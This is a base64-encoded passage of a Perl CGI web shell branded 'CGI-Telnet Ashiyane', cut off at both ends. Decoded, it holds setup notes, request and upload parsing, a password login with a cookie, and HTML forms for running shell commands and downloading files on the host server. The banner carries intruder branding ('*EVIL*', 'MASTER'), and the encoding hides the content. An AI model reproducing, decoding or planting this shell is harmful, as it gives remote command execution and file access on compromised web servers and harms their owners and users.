yIHdlYiBicm93c2VyLiBJZiB5b3UgdXBsb2FkZWQgdGhlIHNjcmlwdCBpbg0KIyAgICBjZ2ktYmluLCB0aGlzIHNob3VsZCBiZSBodHRwOi8vd3d3LnlvdXJzZXJ2ZXIuY29tL2NnaS1iaW4vY2dpdGVsbmV0LnBsDQojIDcuIExvZ2luIHVzaW5nIHRoZSBwYXNzd29yZCB0aGF0IHlvdSBzcGVjaWZpZWQgaW4gU3RlcCAyLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIENvbmZpZ3VyYXRpb246IFlvdSBuZWVkIHRvIGNoYW5nZSBvbmx5ICRQYXNzd29yZCBhbmQgJFdpbk5ULiBUaGUgb3RoZXINCiMgdmFsdWVzIHNob3VsZCB3b3JrIGZpbmUgZm9yIG1vc3Qgc3lzdGVtcy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCgkJIyBDaGFuZ2UgdGhpcy4gWW91IHdpbGwgbmVlZCB0byBlbnRlciB0aGlzDQoJCQkJIyB0byBsb2dpbi4NCg0KJFdpbk5UID0gMDsJCQkjIFlvdSBuZWVkIHRvIGNoYW5nZSB0aGUgdmFsdWUgb2YgdGhpcyB0byAxIGlmDQoJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQNCgkJCQkjIG1hY2hpbmUuIElmIHlvdSdyZSBydW5uaW5nIGl0IG9uIFVuaXgsIHlvdQ0KCQkJCSMgY2FuIGxlYXZlIHRoZSB2YWx1ZSBhcyBpdCBpcy4NCg0KJE5UQ21kU2VwID0gIiYiOwkJIyBUaGlzIGNoYXJhY3RlciBpcyB1c2VkIHRvIHNlcGVyYXRlIDIgY29tbWFuZHMNCgkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFdpbmRvd3MgTlQuDQoNCiRVbml4Q21kU2VwID0gIjsiOwkJIyBUaGlzIGNoYXJhY3RlciBpcyB1c2VkIHRvIHNlcGVyYXRlIDIgY29tbWFuZHMNCgkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFVuaXguDQoNCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkDQoJCQkJIyBEb24ndCBzZXQgdGhpcyB0byBhIHZlcnkgbGFyZ2UgdmFsdWUuIFRoaXMgaXMNCgkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0DQoJCQkJIyB0YWtlIHZlcnkgbG9uZyB0byBleGVjdXRlLCBsaWtlICJmaW5kIC8iLg0KCQkJCSMgVGhpcyBpcyB2YWxpZCBvbmx5IG9uIFVuaXggc2VydmVycy4gSXQgaXMNCgkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4NCg0KJFNob3dEeW5hbWljT3V0cHV0ID0gMTsJCSMgSWYgdGhpcyBpcyAxLCB0aGVuIGRhdGEgaXMgc2VudCB0byB0aGUNCgkJCQkjIGJyb3dzZXIgYXMgc29vbiBhcyBpdCBpcyBvdXRwdXQsIG90aGVyd2lzZQ0KCQkJCSMgaXQgaXMgYnVmZmVyZWQgYW5kIHNlbmQgd2hlbiB0aGUgY29tbWFuZA0KCQkJCSMgY29tcGxldGVzLiBUaGlzIGlzIHVzZWZ1bCBmb3IgY29tbWFuZHMgbGlrZQ0KCQkJCSMgcGluZywgc28gdGhhdCB5b3UgY2FuIHNlZSB0aGUgb3V0cHV0IGFzIGl0DQoJCQkJIyBpcyBiZWluZyBnZW5lcmF0ZWQuDQoNCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISENCg0KJENtZFNlcCA9ICgkV2luTlQgPyAkTlRDbWRTZXAgOiAkVW5peENtZFNlcCk7DQokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7DQokUGF0aFNlcCA9ICgkV2luTlQgPyAiXFwiIDogIi8iKTsNCiRSZWRpcmVjdG9yID0gKCRXaW5OVCA/ICIgMj4mMSAxPiYyIiA6ICIgMT4mMSAyPiYxIik7DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUmVhZHMgdGhlIGlucHV0IHNlbnQgYnkgdGhlIGJyb3dzZXIgYW5kIHBhcnNlcyB0aGUgaW5wdXQgdmFyaWFibGVzLiBJdA0KIyBwYXJzZXMgR0VULCBQT1NUIGFuZCBtdWx0aXBhcnQvZm9ybS1kYXRhIHRoYXQgaXMgdXNlZCBmb3IgdXBsb2FkaW5nIGZpbGVzLg0KIyBUaGUgZmlsZW5hbWUgaXMgc3RvcmVkIGluICRpbnsnZid9IGFuZCB0aGUgZGF0YSBpcyBzdG9yZWQgaW4gJGlueydmaWxlZGF0YSd9Lg0KIyBPdGhlciB2YXJpYWJsZXMgY2FuIGJlIGFjY2Vzc2VkIHVzaW5nICRpbnsndmFyJ30sIHdoZXJlIHZhciBpcyB0aGUgbmFtZSBvZg0KIyB0aGUgdmFyaWFibGUuIE5vdGU6IE1vc3Qgb2YgdGhlIGNvZGUgaW4gdGhpcyBmdW5jdGlvbiBpcyB0YWtlbiBmcm9tIG90aGVyIENHSQ0KIyBzY3JpcHRzLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFJlYWRQYXJzZSANCnsNCglsb2NhbCAoKmluKSA9IEBfIGlmIEBfOw0KCWxvY2FsICgkaSwgJGxvYywgJGtleSwgJHZhbCk7DQoJDQoJJE11bHRpcGFydEZvcm1EYXRhID0gJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC87DQoNCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQ0KCXsNCgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQoJfQ0KCWVsc2lmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIlBPU1QiKQ0KCXsNCgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOw0KCQlyZWFkKFNURElOLCAkaW4sICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KCX0NCg0KCSMgaGFuZGxlIGZpbGUgdXBsb2FkIGRhdGENCglpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykNCgl7DQoJCSRCb3VuZGFyeSA9ICctLScuJDE7ICMgcGxlYXNlIHJlZmVyIHRvIFJGQzE4NjcgDQoJCUBsaXN0ID0gc3BsaXQoLyRCb3VuZGFyeS8sICRpbik7IA0KCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOw0KCQkkSGVhZGVyQm9keSA9fiAvXHJcblxyXG58XG5cbi87DQoJCSRIZWFkZXIgPSAkYDsNCgkJJEJvZHkgPSAkJzsNCiAJCSRCb2R5ID1+IHMvXHJcbiQvLzsgIyB0aGUgbGFzdCBcclxuIHdhcyBwdXQgaW4gYnkgTmV0c2NhcGUNCgkJJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7DQoJCSRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsgDQoJCSRpbnsnZid9ID0gJDE7IA0KCQkkaW57J2YnfSA9fiBzL1wiLy9nOw0KCQkkaW57J2YnfSA9fiBzL1xzLy9nOw0KDQoJCSMgcGFyc2UgdHJhaWxlcg0KCQlmb3IoJGk9MjsgJGxpc3RbJGldOyAkaSsrKQ0KCQl7IA0KCQkJJGxpc3RbJGldID1+IHMvXi4rbmFtZT0kLy87DQoJCQkkbGlzdFskaV0gPX4gL1wiKFx3KylcIi87DQoJCQkka2V5ID0gJDE7DQoJCQkkdmFsID0gJCc7DQoJCQkkdmFsID1+IHMvKF4oXHJcblxyXG58XG5cbikpfChcclxuJHxcbiQpLy9nOw0KCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsNCgkJCSRpbnska2V5fSA9ICR2YWw7IA0KCQl9DQoJfQ0KCWVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQ0KCXsNCgkJQGluID0gc3BsaXQoLyYvLCAkaW4pOw0KCQlmb3JlYWNoICRpICgwIC4uICQjaW4pDQoJCXsNCgkJCSRpblskaV0gPX4gcy9cKy8gL2c7DQoJCQkoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOw0KCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsNCgkJCSRpbnska2V5fSAuPSAkdmFsOw0KCQl9DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBQYWdlIEhlYWRlcg0KIyBBcmd1bWVudCAxOiBGb3JtIGl0ZW0gbmFtZSB0byB3aGljaCBmb2N1cyBzaG91bGQgYmUgc2V0DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlSGVhZGVyDQp7DQoJJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7DQoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsNCglwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCglwcmludCA8PEVORDsNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+QXNoaXlhbmU8L3RpdGxlPg0KJEh0bWxNZXRhSGVhZGVyDQo8L2hlYWQ+DQo8Ym9keSBvbkxvYWQ9ImRvY3VtZW50LmYuQF8uZm9jdXMoKSIgYmdjb2xvcj0iIzAwMDAwMCIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIj4NCjx0YWJsZSBib3JkZXI9IjEiIHdpZHRoPSIxMDAlIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjIiPg0KPHRyPg0KPHRkIGJnY29sb3I9IiNDMkJGQTUiIGJvcmRlcmNvbG9yPSIjMDAwMDgwIiBhbGlnbj0iY2VudGVyIj4NCjxiPjxmb250IGNvbG9yPSIjMDAwMDgwIiBzaXplPSIyIj4jPC9mb250PjwvYj48L3RkPg0KPHRkIGJnY29sb3I9IiMwMDAwODAiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiIGNvbG9yPSIjMDA5OTAwIj48Yj5DR0ktVGVsbmV0IEFzaGl5YW5lIENvbm5lY3RlZCB0byAkU2VydmVyTmFtZTwvYj48L2ZvbnQ+PC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQgY29sc3Bhbj0iMiIgYmdjb2xvcj0iI0MyQkZBNSI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+DQo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT11cGxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPlVwbG9hZCBGaWxlPC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWxvZ291dCI+RGlzY29ubmVjdDwvYT4gfA0KPGEgaHJlZj0iVU5JVFhfVEVBTUBIT1RNQUlMLkNPTSI+SGVscDwvYT4NCjwvZm9udD48L3RkPg0KPC90cj4NCjwvdGFibGU+DQo8Zm9udCBjb2xvcj0iIzAwOTkwMCIgc2l6ZT0iMyI+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9naW5TY3JlZW4NCnsNCgkkTWVzc2FnZSA9IHEkPHByZT48Zm9udCBjb2xvcj0iI2ZmMDAwMCI+IF9fX19fICBfX19fXyAgX19fX18gICAgICAgICAgX19fX18gICAgICAgIF8gICAgICAgICAgICAgICBfDQovICBfXyBcfCAgX18gXHxfICAgX3wgICAgICAgIHxfICAgX3wgICAgICB8IHwgICAgICAgICAgICAgfCB8DQp8IC8gIFwvfCB8ICBcLyAgfCB8ICAgX19fX19fICAgfCB8ICAgIF9fXyB8IHwgXyBfXyAgICBfX18gfCB8Xw0KfCB8ICAgIHwgfCBfXyAgIHwgfCAgfF9fX19fX3wgIHwgfCAgIC8gXyBcfCB8fCAnXyBcICAvIF8gXHwgX198DQp8IFxfXy9cfCB8X1wgXCBffCB8XyAgICAgICAgICAgfCB8ICB8ICBfXy98IHx8IHwgfCB8fCAgX18vfCB8Xw0KIFxfX19fLyBcX19fXy8gXF9fXy8gICAgICAgICAgIFxfLyAgIFxfX198fF98fF98IHxffCBcX19ffCBcX198IDEuMA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCjwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+ICAgICAgICAgICAgICAgICAgICAgIF9fX19fXyAgICAgICAgICAgICA8L2ZvbnQ+PGZvbnQgY29sb3I9IiNBRTgzMDAiPsKpIDIwMDMsIEFzaGl5YW5lPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4NCiAgICAgICAgICAgICAgICAgICAuLSZxdW90OyAgICAgICZxdW90Oy0uDQogICAgICAgICAgICAgICAgICAvICAgVU5JVC1YICAgXA0KICAgICAgICAgICAgICAgICB8ICAgICAgICAgICAgICB8DQogICAgICAgICAgICAgICAgIHwsICAuLS4gIC4tLiAgLHwNCiAgICAgICAgICAgICAgICAgfCApKF9vLyAgXG9fKSggfA0KICAgICAgICAgICAgICAgICB8LyAgICAgL1wgICAgIFx8DQogICAgICAgKEBfICAgICAgIChfICAgICBeXiAgICAgXykNCiAgXyAgICAgKSBcPC9mb250Pjxmb250IGNvbG9yPSIjMDA5OTAwIj5fX19fX19fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5cPC9mb250Pjxmb250IGNvbG9yPSIjMDA5OTAwIj5fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+fCpFVklMKnw8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDk5MDAiPl9fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4vPC9mb250Pjxmb250IGNvbG9yPSIjMDA5OTAwIj5fX19fX19fX19fX19fX19fX19fX19fXw0KPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4gKF8pPC9mb250Pjxmb250IGNvbG9yPSIjMDA5OTAwIj5AOEA4PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj57fTwvZm9udD48Zm9udCBjb2xvcj0iIzAwOTkwMCI+Jmx0O19fX19fX19fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj58LVxNQVNURVIvLXw8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDk5MDAiPl9fX19fX19fX19fX19fX19fX19fX19fXyZndDs8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPg0KICAgICAgICApXy8gICAgICAgIFwgICAgICAgICAgLyANCiAgICAgICAoQCAgICAgICAgICAgYC0tLS0tLS0tYA0KICAgICAgICAgICAgIDwvZm9udD48Zm9udCBjb2xvcj0iI0FFODMwMCI+VyBBIFIgTiBJIE4gRzogUHJpdmF0ZSBTZXJ2ZXI8L2ZvbnQ+PC9wcmU+DQokOw0KIycNCglwcmludCA8PEVORDsNCjxjb2RlPg0KVHJ5aW5nICRTZXJ2ZXJOYW1lLi4uPGJyPg0KQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPGJyPg0KRXNjYXBlIGNoYXJhY3RlciBpcyBeXQ0KPGNvZGU+JE1lc3NhZ2UNCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQo8YnI+bG9naW46IGFkbWluPGJyPg0KcGFzc3dvcmQ6PGJyPg0KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRMb2dpbkZvcm0NCnsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0ibG9naW4iPg0KbG9naW46IGFkbWluPGJyPg0KcGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4NCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFbnRlciI+DQo8L2Zvcm0+DQo8L2NvZGU+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIGZvb3RlciBmb3IgdGhlIEhUTUwgUGFnZQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUZvb3Rlcg0Kew0KCXByaW50ICI8L2ZvbnQ+PC9ib2R5PjwvaHRtbD4iOw0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFJldHJlaXZlcyB0aGUgdmFsdWVzIG9mIGFsbCBjb29raWVzLiBUaGUgY29va2llcyBjYW4gYmUgYWNjZXNzZXMgdXNpbmcgdGhlDQojIHZhcmlhYmxlICRDb29raWVzeycnfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEdldENvb2tpZXMNCnsNCglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOw0KCWZvcmVhY2ggJGNvb2tpZShAaHR0cGNvb2tpZXMpDQoJew0KCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7DQoJCSRDb29raWVzeyRpZH0gPSAkdmFsOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRMb2dvdXRTY3JlZW4NCnsNCglwcmludCAiPGNvZGU+Q29ubmVjdGlvbiBjbG9zZWQgYnkgZm9yZWlnbiBob3N0Ljxicj48YnI+PC9jb2RlPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgTG9ncyBvdXQgdGhlIHVzZXIgYW5kIGFsbG93cyB0aGUgdXNlciB0byBsb2dpbiBhZ2Fpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBlcmZvcm1Mb2dvdXQNCnsNCglwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9O1xuIjsgIyByZW1vdmUgcGFzc3dvcmQgY29va2llDQoJJlByaW50UGFnZUhlYWRlcigicCIpOw0KCSZQcmludExvZ291dFNjcmVlbjsNCgkmUHJpbnRMb2dpblNjcmVlbjsNCgkmUHJpbnRMb2dpbkZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB0byBsb2dpbiB0aGUgdXNlci4gSWYgdGhlIHBhc3N3b3JkIG1hdGNoZXMsIGl0DQojIGRpc3BsYXlzIGEgcGFnZSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBydW4gY29tbWFuZHMuIElmIHRoZSBwYXNzd29yZCBkb2Vucyd0DQojIG1hdGNoIG9yIGlmIG5vIHBhc3N3b3JkIGlzIGVudGVyZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlcg0KIyB0byBsb2dpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBlcmZvcm1Mb2dpbiANCnsNCglpZigkTG9naW5QYXNzd29yZCBlcSAkUGFzc3dvcmQpICMgcGFzc3dvcmQgbWF0Y2hlZA0KCXsNCgkJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPSRMb2dpblBhc3N3b3JkO1xuIjsNCgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQoJZWxzZSAjIHBhc3N3b3JkIGRpZG4ndCBtYXRjaA0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigicCIpOw0KCQkmUHJpbnRMb2dpblNjcmVlbjsNCgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZA0KCQl7DQoJCQkmUHJpbnRMb2dpbkZhaWxlZE1lc3NhZ2U7DQoJCX0NCgkJJlByaW50TG9naW5Gb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0KJFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPg0KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGRvd25sb2FkIGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlRG93bmxvYWRGb3JtDQp7DQoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7DQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJkb3dubG9hZCI+DQokUHJvbXB0IGRvd25sb2FkPGJyPjxicj4NCkZpbGVuYW1lOiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+DQpEb3dubG9hZDogPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkJlZ2luIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dz